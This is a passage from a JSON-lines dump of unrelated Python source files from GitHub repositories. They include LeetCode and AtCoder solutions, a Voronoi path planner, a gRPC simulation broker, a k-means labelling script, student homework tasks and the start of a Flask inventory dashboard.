singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n hashmap = {}\n while headA:\n hashmap[headA] = True\n headA = headA.next\n while headB:\n if headB in hashmap:\n return headB\n headB = headB.next\n return None","repo_name":"Witness521/leetcode","sub_path":"HOT100/160相交链表.py","file_name":"160相交链表.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30173873811","text":"import random\n\n\nclass RandomModel:\n '''Predicts race results randomly'''\n\n def __init__(self, seasonsData, raceResultsData):\n self.seasonsData = seasonsData\n self.raceResultsData = raceResultsData\n\n def constructPredictions(self):\n predictions = []\n\n for year, season in self.seasonsData.items(): # Read every season:\n racesAsList = list(season.races.items())\n racesAsList.sort(key=lambda x: x[1].round)\n for raceId, data in racesAsList:\n # A single race\n if raceId in self.raceResultsData:\n results = self.raceResultsData[raceId]\n driver_ids = [x['driverId'] for x in results]\n random.shuffle(driver_ids)\n predictions.append(driver_ids)\n return predictions","repo_name":"villekuosmanen/F1Predict","sub_path":"f1predict/race/baseline/RandomModel.py","file_name":"RandomModel.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"48"} +{"seq_id":"25458225723","text":"\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom .dijkstra_search import DijkstraSearch\n# from dijkstra_search import DijkstraSearch\n\nfrom scipy.spatial import cKDTree, Voronoi\n#constants\nCYLINDER = 3\nSPHERE = 2\n\npi=math.pi\ndef PointsInCircum(r,n=100):\n return [(math.cos(2*pi/n*x)*r,math.sin(2*pi/n*x)*r) for x in range(0,n+1)]\n\nclass VoronoiRoadMapPlanner:\n def __init__(self,show_animation=False):\n self.show_animation = show_animation\n # parameter\n self.N_KNN = 15 # number of edge from one sampled point\n self.MAX_EDGE_LEN = 100.0 # [m] Maximum edge length\n\n # start and goal position\n self.sx = -3 # [m]\n self.sy = -2 # [m]\n self.gx = 4 # [m]\n self.gy = 3 # [m]\n self.robot_radius = 0.8 # [m]\n\n #setup world\n obs_setup=[\n ( 0, 2,0, CYLINDER ),\n ( -2, 2,0, CYLINDER ),\n ( 2, 2,0, CYLINDER ),\n ( 2, 0,0, CYLINDER ),\n ( 2,-2,0, CYLINDER ),\n\n # ( 3,-4,0, SPHERE ),\n # ( 4,-3,0, SPHERE )\n ]\n\n lims_positions=[\n ( 5, 5,0 ),\n ( -5, 5,0 ),\n ( 5,-5,0 ),\n ( -5,-5,0 )\n ]\n self.setupLimits()\n\n self.addObstacles(obs_setup) #uncomment this only while debugging\n\n if self.show_animation:\n plt.plot(self.ox, self.oy, \".k\")\n plt.plot(self.sx, self.sy, \"^r\")\n plt.plot(self.gx, self.gy, \"^c\")\n plt.grid(True)\n plt.axis(\"equal\")\n\n def setupLimits(self):\n self.ox,self.oy = [] ,[]\n\n limit_len=10\n n_points_limits=20\n for i in range(n_points_limits):\n self.ox.append(i/n_points_limits*limit_len-limit_len/2)\n self.oy.append(limit_len/2)\n for i in range(n_points_limits):\n self.ox.append(limit_len/2)\n self.oy.append(i/n_points_limits*limit_len-limit_len/2)\n\n for i in range(n_points_limits):\n self.ox.append(-limit_len/2)\n self.oy.append(i/n_points_limits*limit_len-limit_len/2)\n\n for i in range(n_points_limits):\n self.ox.append(i/n_points_limits*limit_len-limit_len/2)\n self.oy.append(-limit_len/2)\n \n def addObstacles(self,obs): \n for ob in obs:\n obsType=ob[3]\n xy=ob[:2]\n r=0.5\n # print(\"obsType:\",obsType)\n if obsType == CYLINDER:\n self.addCylinderObs(r,xy)\n elif obsType == SPHERE:\n self.addSphereObs(r,xy)\n\n def addSphereObs(self,r,pos):\n points=PointsInCircum(r=r,n=20)\n for i in points:\n # print(\"Adding cylinder at pos (%f,%f) \"% ( pos[0],pos[1] ) )\n self.ox.append(i[0]+pos[0])\n self.oy.append(i[1]+pos[1])\n \n def addCylinderObs(self,r,pos):\n points=PointsInCircum(r=r,n=20)\n for i in points:\n # print(\"Adding sphere at pos (%f,%f) \"% ( pos[0],pos[1] ) )\n self.ox.append(i[0]+pos[0])\n self.oy.append(i[1]+pos[1])\n\n def planning(self):\n sx, sy = self.sx,self.sy\n gx, gy = self.gx,self.gy\n ox, oy = self.ox,self.oy\n robot_radius = self.robot_radius\n\n obstacle_tree = cKDTree(np.vstack((ox, oy)).T)\n\n sample_x, sample_y = self.voronoi_sampling(sx, sy, gx, gy, ox, oy)\n if self.show_animation : \n plt.plot(sample_x, sample_y, \".b\")\n\n road_map_info = self.generate_road_map_info(\n sample_x, sample_y, robot_radius, obstacle_tree)\n # self.plot_road_map(road_map_info, sample_x, sample_y)\n rx, ry = DijkstraSearch( self.show_animation ).search(sx, sy, gx, gy,\n sample_x, sample_y,\n road_map_info)\n \n assert rx, 'Cannot found path'\n\n if self.show_animation: \n plt.plot(rx, ry, \"-r\")\n plt.pause(0.1)\n plt.show()\n \n return rx, ry\n\n def is_collision(self, sx, sy, gx, gy, rr, obstacle_kd_tree):\n x = sx\n y = sy\n dx = gx - sx\n dy = gy - sy\n yaw = math.atan2(gy - sy, gx - sx)\n d = math.hypot(dx, dy)\n\n if d >= self.MAX_EDGE_LEN:\n return True\n\n D = rr\n n_step = round(d / D)\n\n for i in range(n_step):\n dist, _ = obstacle_kd_tree.query([x, y])\n if dist <= rr:\n return True # collision\n x += D * math.cos(yaw)\n y += D * math.sin(yaw)\n\n # goal point check\n dist, _ = obstacle_kd_tree.query([gx, gy])\n if dist <= rr:\n return True # collision\n\n return False # OK\n\n def generate_road_map_info(self, node_x, node_y, rr, obstacle_tree):\n \"\"\"\n Road map generation\n\n node_x: [m] x positions of sampled points\n node_y: [m] y positions of sampled points\n rr: Robot Radius[m]\n obstacle_tree: KDTree object of obstacles\n \"\"\"\n\n road_map = []\n n_sample = len(node_x)\n node_tree = cKDTree(np.vstack((node_x, node_y)).T)\n\n for (i, ix, iy) in zip(range(n_sample), node_x, node_y):\n\n dists, indexes = node_tree.query([ix, iy], k=n_sample)\n\n edge_id = []\n\n for ii in range(1, len(indexes)):\n nx = node_x[indexes[ii]]\n ny = node_y[indexes[ii]]\n\n # if(nx==self.gx and ny==self.gy ):\n # edge_id.append(indexes[ii])\n \n if not self.is_collision(ix, iy, nx, ny, rr, obstacle_tree):\n edge_id.append(indexes[ii])\n\n if len(edge_id) >= self.N_KNN:\n break\n\n road_map.append(edge_id)\n\n #self.plot_road_map(road_map, node_x, node_y)\n\n return road_map\n\n @staticmethod\n def plot_road_map(road_map, sample_x, sample_y): # pragma: no cover\n\n for i, _ in enumerate(road_map):\n for ii in range(len(road_map[i])):\n ind = road_map[i][ii]\n\n plt.plot([sample_x[i], sample_x[ind]],\n [sample_y[i], sample_y[ind]], \"-k\")\n\n @staticmethod\n def voronoi_sampling(sx, sy, gx, gy, ox, oy):\n oxy = np.vstack((ox, oy)).T\n\n # generate voronoi point\n vor = Voronoi(oxy)\n sample_x = [ix for [ix, _] in vor.vertices]\n sample_y = [iy for [_, iy] in vor.vertices]\n\n sample_x.append(sx)\n sample_y.append(sy)\n sample_x.append(gx)\n sample_y.append(gy)\n\n return sample_x, sample_y\n\nif __name__==\"__main__\":\n planner = VoronoiRoadMapPlanner(show_animation=True)\n planner.planning()","repo_name":"marios-stam/Collaborative-Drones_Flexible-Objects","sub_path":"thesis_drone/src/path_planning/path_planner.py","file_name":"path_planner.py","file_ext":"py","file_size_in_byte":6783,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25654999225","text":"def solve():\n N, K = map(int, input().split())\n ans = 0\n\n for i in range(1, N+1):\n count = 0\n while i * 2 ** count < K:\n count += 1\n ans += (1 / N) * (1 / 2 ** count)\n\n print(ans)\n\nif __name__ == '__main__':\n solve()","repo_name":"yuly3/atcoder","sub_path":"ABC/ABC126/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7765202726","text":"from PIL import Image\nimport numpy as np\nimport os\nimport re\n\ndef is_feature_present(input_array):\n # num_1 = np.count_nonzero(input_array)\n # num_0 = 512*512 - num_1\n # print('********point1***********\\n label #1 > #0', num_1>num_0)\n # assert num_1 < num_0, 'label 1 should be label but now is background'\n \n return (np.sum(input_array)>0)\n\n\ndef load_feature_data(frame_dir, mask_dir, gradient=False, dim=512):\n \n '''load frames and masks into two numpy array respectively\n -----\n condition: with feature\n input: frame_dir, mask_dir (each file in tif format)\n -----\n '''\n frames = []\n masks = []\n minn = float(\"inf\")\n maxx = 0.0\n frame_names = os.listdir(frame_dir)\n frame_names.sort(key=lambda var:[int(x) if x.isdigit() else x \n for x in re.findall(r'[^0-9]|[0-9]+', var)])\n for frame_file in frame_names:\n frame_path = os.path.join(frame_dir, frame_file)\n if frame_file[-3:]=='tif':\n mask_path = os.path.join(mask_dir, frame_file.replace('fillnodata','building_label'))\n frame_array = np.array(Image.open(frame_path))\n label_array = np.array(Image.open(mask_path))\n else:\n mask_path = os.path.join(mask_dir, frame_file)\n frame_array = np.load(frame_path)\n label_array = np.load(mask_path)\n frame_array = frame_array\n dims = frame_array.shape\n if dims[0]!=dim or dims[1]!=dim:\n continue\n if(is_feature_present(label_array)):\n if gradient:\n [dx, dy] = np.gradient(frame_array)\n frame_array = np.sqrt((dx*dx)+(dy*dy))\n amin, amax = np.min(frame_array), np.max(frame_array)\n if amin < minn: minn = amin \n if amax > maxx: maxx = amax \n frames.append(frame_array)\n masks.append(label_array)\n \n return np.array(frames),np.array(masks), minn, maxx\n\ndef preprocess(Data, minn, maxx, dim=128, low=0.1, hi=1.0):\n \"\"\"Normalize and rescale (and optionally invert) images by local minn and maxx. \n Parameters\n ----------\n Data : hdf5\n Data array.\n dim : integer, optional\n Dimensions of images, assumes square.\n low : float, optional\n Minimum rescale value. Default is 0.1 since background pixels are 0.\n hi : float, optional\n Maximum rescale value.\n \"\"\"\n for key in Data:\n print (key)\n\n Data[key][0] = Data[key][0].reshape(len(Data[key][0]), dim, dim, 1)\n for i, img in enumerate(Data[key][0]):\n img = img / 255.\n # img[img > 0.] = 1. - img[img > 0.] #inv color\n minn, maxx = np.min(img[img > 0]), np.max(img[img > 0])\n img[img > 0] = low + (img[img > 0] - minn) * (hi - low) / (maxx - minn)\n Data[key][0][i] = img \n \n","repo_name":"IllinoisStateGeologicalSurvey/DEM_segmentation","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73001527507","text":"import pandas as pd\r\nimport numpy as np\r\n\r\n# data = pd.read_excel('thickness/sub_01_thickness.xlsx')\r\n# roiname = data['StructName']\r\n# roiname.to_csv('rois/RoiName.csv')\r\n\r\nroiname = list(pd.read_csv('rois/RoiName.csv')['StructName'])\r\n\r\nparticipants = pd.read_excel('fmriprep/participants.xlsx')\r\nsubindex = np.array(participants['subindex'])\r\ncondition = participants['Condition3']\r\n\r\ni = 0\r\nCortThick = pd.DataFrame(np.zeros((98,360)),columns=roiname)\r\n\r\nfor sub in subindex:\r\n if sub < 10:\r\n path = \"thickness/sub_0\" + str(sub) + \"_thickness.xlsx\"\r\n data = pd.read_excel(path)\r\n value = pd.Series(np.array(data['Mean']), index=list(roiname))\r\n CortThick.loc[i] = value\r\n i = i + 1\r\n else:\r\n path = \"thickness/sub_\" + str(sub) + \"_thickness.xlsx\"\r\n data = pd.read_excel(path)\r\n value = pd.Series(np.array(data['Mean']), index=list(roiname))\r\n CortThick.loc[i] = value\r\n i = i + 1\r\n\r\nCortThick.insert(0,\"SubIndex\",subindex,True)\r\nCortThick.insert(1,\"Condition\",condition,True)\r\n\r\nCortThick.to_csv('processdata/CortThick.csv')\r\n\r\n# convert into nparray\r\nAnatomicalRegressor = pd.read_csv('processdata/CortThick.csv')\r\nCortThickness = np.array(AnatomicalRegressor[AnatomicalRegressor.columns[3:363]])\r\nnp.save(\"processdata/CortThickness\",CortThickness)\r\n\r\n","repo_name":"BeiGeJin/SchizophreniaClassifier","sub_path":"GetCortThick.py","file_name":"GetCortThick.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8126757551","text":"class Solution(object):\n def nextPermutation(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n larger = p = len(nums) - 1\n while p >= 1 and nums[p] <= nums[p - 1]:\n p -= 1\n if p == 0:\n nums.reverse()\n return\n while larger >= 0 and nums[larger] <= nums[p - 1]:\n larger -= 1\n nums[larger], nums[p - 1] = nums[p - 1], nums[larger]\n # reverse the remain\n l = p\n r = len(nums) - 1\n while l < r:\n nums[l], nums[r] = nums[r], nums[l]\n l += 1\n r -= 1\n\n\n\n","repo_name":"YingbingZhu/python_leetcode","sub_path":"two_pointers/31. Next Permutation.py","file_name":"31. Next Permutation.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15537188385","text":"from concurrent import futures\nimport sys\n\nimport argparse\nimport grpc\nimport numpy as np\n\nimport trustworthy_search_pb2_grpc as rpc\nimport trustworthy_search_pb2 as ts\n\n\n# Implementation of Broker service from trustworthy_search.proto\nclass Broker(rpc.BrokerServicer):\n # Upon initialization of the broker, connect the search stub (the\n # connection to the server) as an instance variable\n # This broker is identified by its (unique) port\n def __init__(self, stub, port):\n self.searchstub = stub\n self.port = port\n np.random.seed(port)\n\n # Push the result from the simulation worker to the search server\n def PushResult(self, request, context):\n request = self.searchstub.UploadSimResult(request)\n return ts.Empty()\n\n\n# Simple load balancing: randomly select a worker who has finished the last\n# job given to it by this broker\ndef getWorkerIndex(worker_futures):\n while True:\n for i in np.random.permutation(len(worker_futures)):\n future = worker_futures[i]\n if future is None or future.done():\n return i\n\n\n# Main function to run a job\ndef run(BROKER_PORT, WORKERPORTSTART, num_workers,\n SSLcertfile, serverURL, serverport,\n threshold, num_evals, grid_density, job_type):\n # open client to search server\n # The communication is authenticated via SSL for security\n with open(SSLcertfile, 'rb') as f:\n creds = grpc.ssl_channel_credentials(f.read())\n search_channel = grpc.secure_channel(serverURL+':'+str(serverport), creds)\n search_stub = rpc.TrustworthySearchStub(search_channel)\n\n # Open broker server. The broker distributes jobs amongst simulation\n # workers\n broker_server = grpc.server(futures.ThreadPoolExecutor(max_workers=100))\n broker = Broker(search_stub, BROKER_PORT)\n rpc.add_BrokerServicer_to_server(broker, broker_server)\n broker_server.add_insecure_port('localhost:'+str(BROKER_PORT))\n broker_server.start()\n\n # Connect a client to simulation workers\n # For this example, the workers are also running on the same machine\n worker_channels = []\n worker_stubs = []\n worker_futures = []\n for i in range(WORKERPORTSTART, WORKERPORTSTART+num_workers):\n worker_channel = grpc.insecure_channel('localhost:' + str(i))\n worker_stub = rpc.SimulatorStub(worker_channel)\n worker_stub.RegisterBroker(ts.BrokerPort(port=BROKER_PORT))\n worker_channels.append(worker_channel)\n worker_stubs.append(worker_stub)\n worker_futures.append(None)\n\n # Start the job by making a request to the search server\n job = search_stub.StartJob(ts.JobRequest(threshold=threshold,\n dimension=2,\n dist_types=[ts.Distribution.GAUSSIAN]*2,\n job_type=job_type,\n job_mode=ts.JobStyle.Mode.MAXIMIZE,\n num_evals=num_evals,\n grid_density=grid_density))\n print('Job id:', job.jobid)\n print('User-input event threshold: ', threshold)\n print('Number of simulations:', num_evals)\n # print information that the server has given about the job (if it exists)\n if len(job.info) > 0:\n print(job.info, '\\n')\n\n # Receive jobs from the search server and distribute amongst the workers\n # The jobs will run asynchronously.\n for simparams in search_stub.OpenSimStream(job):\n idx = getWorkerIndex(worker_futures)\n brokerparams = ts.BrokerSimParams(simparams=simparams, port=BROKER_PORT)\n # asynchronous call to simulation worker\n worker_futures[idx] = worker_stubs[idx].Simulate.future(brokerparams)\n if simparams.simid % 5:\n temp = round(100*(simparams.simid+1)*1.0/num_evals)\n sys.stdout.write(\"\\rEstimated percent complete: %d%%\" % (temp))\n sys.stdout.flush()\n print('\\nDone')\n\n # Get results\n print('\\nIn this demo, we return the results of the job you just ran.')\n print('Specifically, we give you back a list of the parameters simualted along with the corresponding objectives.')\n print('The full API includes further analysis of the failure modes discovered (eg dimensionality-reduced visualizations, importance-sampler built on failure modes, etc).\\n')\n jobresult = search_stub.GetJobResult(job)\n\n print('Sim id', '\\t', 'Done', '\\t', 'Params', '\\t', 'Objective')\n np.set_printoptions(precision=2)\n for result in jobresult.results:\n print(result.simid, '\\t', result.completed, '\\t', np.array(result.params), '\\t', result.objective)\n\n # Close search and worker clients, and stop broker server\n for i in range(len(worker_stubs)):\n worker_stubs[i].DeregisterBroker(ts.BrokerPort(port=BROKER_PORT))\n worker_channels[i].close()\n broker_server.stop(0)\n search_channel.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--port', type=int, required=True, help='Pick a unique port not used by any other process (including other brokers). 5000 is usually a good choice.')\n parser.add_argument('--workerportstart', type=int, default=6000, help='default = 6000')\n parser.add_argument('--num_workers', type=int, default=10, help='default = 10')\n parser.add_argument('--SSLcert', default='trial_server.crt', help='default = trial_server.crt')\n parser.add_argument('--serverURL', default='trial.trustworthy.ai', help='default = trial.trustworthy.ai')\n parser.add_argument('--serverport', type=int, default=443, help='default = 443')\n parser.add_argument('--threshold', type=float, default=2, help='Threshold level (gamma) for event search. Default = 2')\n parser.add_argument('--num_evals', type=int, default=100, help='Number of simulatons to run. Default = 100')\n parser.add_argument('--grid_density', type=int, nargs='+', default=[10, 10], help='Grid density for GRID job style. Default 10 10')\n parser.add_argument('--job_type', type=str, choices=['MONTECARLO', 'GRID', 'STRESSTEST', 'RISK'], default='MONTECARLO',\n help='Options are MONTECARLO (default), GRID, STRESSTEST, RISK')\n args = parser.parse_args()\n type_dict = {'RISK': ts.JobStyle.Type.RISK,\n 'GRID': ts.JobStyle.Type.GRID,\n 'MONTECARLO': ts.JobStyle.Type.MONTECARLO,\n 'STRESSTEST': ts.JobStyle.Type.STRESSTEST}\n run(args.port, args.workerportstart, args.num_workers,\n args.SSLcert, args.serverURL, args.serverport,\n args.threshold, args.num_evals, args.grid_density, type_dict[args.job_type])\n","repo_name":"amansinha/trustworthysearch-demo","sub_path":"python/broker.py","file_name":"broker.py","file_ext":"py","file_size_in_byte":6724,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"70206816147","text":"''' optimization for k-means algorithm, given target file'''\nfrom misc import *\ninfile = \"stack.bin\" # default input file\n\nif len(args) < 2 and not os.path.exists(\"stack.bin\"): err(\"kmeans_optimization.py [input image to run kmeans on]\")\nelse:\n if len(args) > 1: infile = args[1]\n\nif not os.path.exists(infile): err(\"failed to find input file: \" + infile)\n\ntf = infile + \"_targets.csv\"\nif not os.path.exists(tf):\n error(\"targets file not found: \" + str(tf))\nlines = open(tf).read().strip().split(\"\\n\")\nlines = [line.strip().split(\",\") for line in lines]\nhdr = lines[0] # 'row', 'lin', 'xoff', 'yoff'\ni_row, i_lin, i_xof, i_yof, i_lab, sep = hdr.index('row'), hdr.index('lin'), hdr.index('xoff'), hdr.index('yoff'), hdr.index('feature_id'), os.path.sep\npath = sep.join(__file__.split(sep)[:-1]) + sep # path to this file\nprint(\"path\", path)\npath = os.path.abspath(os.path.expanduser(os.path.expandvars(path))) + sep\n\nncol, nrow, bands = read_hdr(infile[:-3] + 'hdr') # read info from image file\nncol, nrow, bands = int(ncol), int(nrow), int(bands)\n\nc, class_label = {}, {} # start K at number of labels\nfor i in range(1, len(lines)): # iterate over the vector labels\n line = lines[i] # csv data\n label = line[i_lab] # text label from csv\n x, y = int(line[i_row]), int(line[i_lin])\n ix = (y * ncol) + x # image coordinates of the point! \n if ix < nrow * ncol: # skip if out of bounds\n class_label[ix] = label # lookup from pix/line coords to text label\n c[label] = (c[label] + 1) if label in c else 1 # start count from 1\nK = len(c) # starting number of classes\n# K -= 1 # for testing, delete this line later\n\ngo = True\nwhile go:\n whoami = os.popen(\"whoami\").read().strip()\n exe = os.path.normpath(path + \"../cpp/kmeans_multi.exe\") # parallel kmeans function executable\n run(exe + \" \" + infile + \" \" + str(K) + \" 3.\") # run kmeans in parallel\n class_file = infile + \"_kmeans.bin\"\n ncol, nrow, bands, data = read_binary(class_file) # read the class map data resulting from kmeans\n\n # data[ data == 0.] = float(\"nan\")\n # print(\"labels\", set(data))\n\n\n kmeans_label = {}\n for i in range(1, len(lines)): # for each vector point of ours\n line = lines[i]\n x, y = int(line[i_row]), int(line[i_lin]) # rowcol coords for the point\n ix = (y * ncol) + x # print(\"row\", line[i_row], line[i_lin], line[i_xof], line[i_yof], line[i_lab], \"class\", data[ix])\n if ix < nrow * ncol:\n kmeans_label[ix] = data[ix]\n\n kmeans_label_by_class = {}\n for p in class_label:\n L = class_label[p]\n kmeans_label_by_class[L] = [] if (L not in kmeans_label_by_class) else (kmeans_label_by_class[L])\n kmeans_label_by_class[L].append(kmeans_label[p])\n\n for c in kmeans_label_by_class: # what would a vectorization for an op like this look like?\n kmeans_label_by_class[c] = set(kmeans_label_by_class[c])\n print(kmeans_label_by_class)\n\n # check if we're done\n bad, empty = False, set()\n for k in kmeans_label_by_class:\n kk = kmeans_label_by_class[k]\n for j in kmeans_label_by_class:\n if k == j: continue\n kj = kmeans_label_by_class[j]\n if kk.intersection(kj) != empty:\n bad = True\n \n if not bad:\n print(\"good\") # clean up labels so that everything outside the known classes is 0, and all clusters for class get same label..\n used_labels = set()\n for k in kmeans_label_by_class:\n for j in kmeans_label_by_class[k]:\n used_labels.add(j)\n print(\"used_labels\", used_labels) \n\n lookup = {}\n for k in range(0, K):\n k = float(k)\n if k not in used_labels:\n lookup[k] = 0.\n\n ci = 1\n for k in kmeans_label_by_class:\n for j in kmeans_label_by_class[k]:\n lookup[j] = ci\n ci += 1\n\n print(\"lookup\", lookup) # now apply lookup\n for i in range(0, nrow* ncol): data[i] = lookup[data[i]]\n\n write_binary(data, class_file) # relabel the data and output\n break # kmeans_label_by_class: {'fireweedandaspen': [0.0], 'blowdownwithlichen': [1.0, 0.0], 'pineburned': [1.0, 1.0, 1.0]}\n K += 1 # try adding a class!\nprint(\"kmeans_label_by_class\", kmeans_label_by_class, \"lookup\", lookup)\n\n# translate the lookup\nfor label in kmeans_label_by_class:\n labels = list(kmeans_label_by_class[label])\n labels = [lookup[i] for i in labels]\n kmeans_label_by_class[label] = set(labels)\nprint(\"kmeans_label_by_class\", kmeans_label_by_class)\n\n\n# do the plotting! \n\nimport matplotlib.pyplot as plt\nhdr = hdr_fn(infile)\nnpx = nrow * ncol\ndata = data.reshape((nrow, ncol))\n\nfig, ax = plt.subplots()\nimg = ax.imshow(data, cmap='Spectral')\n# ax.set_aspect(\"auto\")\ncbar = plt.colorbar(img)# .legend([0, 1, 2, 3], ['0', '1', '2', '3'])\\\ntick_labels = [\"noise\"]\nci = 1\nfor label in kmeans_label_by_class:\n tick_labels.append(label)\n x = kmeans_label_by_class[label]\n if set([ci]) != x:\n err(\"color index problem\")\n ci += 1\ncbar.set_ticks(np.arange(len(tick_labels)))\nprint(\"tick_labels\", tick_labels)\ncbar.ax.set_yticklabels(tick_labels) #\"bad\", \"good\", \"other\", \"more\", \"what\"])\nplt.tight_layout()\nplt.show()\n# run(\"python3 \" + path + \"read_multi.py \" + infile + \"_kmeans.bin\")\n","repo_name":"bcgov/wps-research","sub_path":"py/bak/kmeans_optimize.py","file_name":"kmeans_optimize.py","file_ext":"py","file_size_in_byte":5335,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"43529567652","text":"# Задача 1. Задайте натуральное число N. Напишите программу, которая составит список простых множителей числа N.\n# 60 -> 2, 2, 3, 5\n\ndef Prime(x):\n import math\n simple = True\n i = 2\n while i <= math.sqrt(x):\n if x % i == 0:\n simple = False\n break\n i += 1\n return(simple)\n\ndef Task1():\n N = int(input('Введите N: '))\n if Prime(N) == True and N == 1:\n print(f'{N} --> [1]')\n\n elif Prime(N) == True and N != 1:\n print(f'{N} --> [1, {N}]')\n\n else:\n nuturalNum = []\n N1 = N\n for i in range (2, (N1//2)+1):\n if Prime(i) == True:\n while N1 % i == 0:\n nuturalNum.append(i)\n N1 /= i\n print(f'{N} --> {nuturalNum}')\n\n\n# Задача 2. В первой строке файла находится информация об ассортименте мороженного,\n# во второй - информация о том, какое мороженное есть на складе. Выведите названия\n# того товара, который закончился.\n# 1. «Сливочное», «Бурёнка», «Вафелька», «Сладкоежка»\n# 2. «Сливочное», «Вафелька», «Сладкоежка»\n# Закончилось: «Бурёнка»\n\n\ndef Task2():\n data = open('ice_cream.txt', encoding='utf-8')\n iceCr = data.readlines()\n data.close()\n\n line1 = set(iceCr[0].replace('\\n', '').split(', '))\n line2 = set(iceCr[1].replace('\\n', '').split(', '))\n print(line1,'\\n', line2)\n print(f'Закончилось: {line1.difference(line2)}')\n \n\n\n# Задача 3. Выведите число π с заданной точностью.\n# Точность вводится пользователем в виде натурального числа.\n# 3 -> 3.142\n# 5 -> 3.14159\n\n\ndef Task3():\n a = int(input('Задайте точность числа пи: '))\n import math\n print(f'{round(math.pi, a)}')\n\n\n# Навигация по задачам в ДЗ №4\nhomework = True\nwhile homework:\n homework = (input(\"Введите номер задачи (1, 2, 3), для выхода введите 'exit': \"))\n if homework == 'exit':\n homework = not homework\n if homework == '1':\n Task1()\n elif homework == '2':\n Task2()\n elif homework == '3':\n Task3()\n","repo_name":"MackAndr/homework_python","sub_path":"homework4.py","file_name":"homework4.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11625301467","text":"import re\n\n\ndef start():\n global file_name\n file_name = input(\"Please, input file name (ex: text.txt)\\n\")\n start() if not file_name else mode_select()\n mode_select()\n\n\ndef mode_select():\n mode = input(\"Please, select mode (r/w):\\n\")\n read_mode() if mode == 'r' else write_mode()\n\n\ndef read_mode():\n read_file = open(file_name, 'r')\n print(read_file.read())\n read_file.close()\n\n\ndef write_mode():\n global file\n numbers = []\n file = open(file_name, 'a')\n amount = is_int(input(\"Please, enter amount of numbers\\n\"))\n print(\"Please, enter numbers (one per line)\\n\")\n for i in range(amount):\n enter = input()\n is_empty(enter)\n num = is_real(enter)\n numbers.append(num)\n save(numbers)\n\n\ndef is_empty(enter):\n if enter == \"\":\n print(\"Empty string\\n\")\n write_mode()\n else:\n return\n\n\ndef is_int(num):\n if num.isdigit() and int(num) >= 0:\n return int(num)\n else:\n raise ValueError(\"Amount must be an integer\")\n\n\ndef is_real(num):\n if num.isdigit():\n return int(num)\n elif re.match(\"\\d+\\.\\d+\", num):\n return float(num)\n else:\n raise ValueError(\"Amount or number is not a real numbers\")\n\n\ndef save(numbers):\n decision = input(\"Save and close? y/n \\n\")\n if decision == 'Y' or decision == 'y':\n lines = (\"\\n\" + \"\\n\".join(map(str, numbers)))\n file.write(lines)\n file.close()\n print(\"File saved and closed\")\n elif decision == 'N' or decision == 'n':\n mode_select()\n else:\n print('You should print only \"y\" or \"n\"')\n\n\nstart()","repo_name":"soberdeer/psp","sub_path":"A1/1B.py","file_name":"1B.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24388154481","text":"# -*- coding: utf-8 -*-\n\nimport sys\ndefaultencoding = 'utf-8'\nif sys.getdefaultencoding() != defaultencoding:\n reload(sys)\n sys.setdefaultencoding(defaultencoding)\n\n\nfrom flask import request, flash, render_template, redirect, url_for\nfrom . import main\nfrom .forms import ServerForm, RaidForm, SwitchForm\nfrom ..models import ServerModel, RaidModel, SwitchModel, db\nfrom ..initdb import get_ks3200_info, get_r5300_info, get_switch_info, update_server_DB, update_switch_DB, update_storage_DB\nimport regex as re\nimport xlwt\nimport xlrd\nfrom flask import send_file, send_from_directory\n\nimport os\nfrom flask import Flask, request\nfrom werkzeug.utils import secure_filename\nimport logging\n\nmain_logger = logging.getLogger('cmdb-zte-1.app.main')\n\n@main.route('/', methods=['GET'])\ndef root():\n return redirect(url_for('main.index'))\n\n\n@main.route('/index', methods=['GET'])\ndef index():\n server_on = ServerModel.query.filter(ServerModel.STATUS.endswith('ON')).all()\n server_on_count = len(server_on)\n server_all = ServerModel.query.all()\n server_all_count = len(server_all)\n switch_on = SwitchModel.query.filter(SwitchModel.STATUS.endswith('ON')).all()\n switch_on_count = len(switch_on)\n switch_all = SwitchModel.query.all()\n switch_all_count = len(switch_all)\n raid_on = RaidModel.query.filter(RaidModel.STATUS.endswith('ON')).all()\n raid_on_count = len(raid_on)\n raid_all = RaidModel.query.all()\n raid_all_count = len(raid_all)\n t1 = 0\n for server in server_on:\n t = server.UPTIME.split(' ')\n if len(t) > 1:\n if len(t) > 6:\n t_1 = t[0].split('天')\n t_2 = t[1].split('小时')\n t_3 = t[2].split('分钟')\n t1 = int(t_1[0])*24 + int(t_2[0]) + int(t_3[0]) % 60 + t1\n else:\n t_1 = t[0].split('小时')\n t_2 = t[1].split('分钟')\n t1 = int(t_1[0]) + int(t_2[0]) % 60 + t1\n t2 = 0\n for switch in switch_on:\n t = switch.UPTIME.split(' ')\n if len(t) > 1:\n if len(t) > 6:\n t_1 = t[0].split('天')\n t_2 = 